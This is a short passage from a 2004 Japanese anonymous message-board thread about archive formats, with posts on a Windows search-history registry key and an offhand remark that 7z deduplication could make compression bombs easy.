834 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 13:39:50 ID:joit0XmS]: Microsoft\search Assiant\ACMru\5603の位置にあったので検索履歴みたいです
ありがとうございました
835 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 14:25:04 ID:ungvXIMz]: test
836 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 14:58:32 ID:xduUn+v/]: >>825
その実験は興味深いな、7zなら重複ファイル簡単に探せるね。
CRCを見てて、同じだったらファイル名だけ残して捨てるんだな
つか、一見、普通のファイル集合体のようで、展開したら
むちゃくちゃ容量食う圧縮爆弾を簡単に作れるじゃねーか。怖。

ちなみにrarだと800KBぐらい

[ 続きを読む ] / [ 携帯版 ]

read.cgi ver5.27 [feat.BBS2 +1.6] / e.0.2 (02/09/03) / eucaly.net products.
担当:undef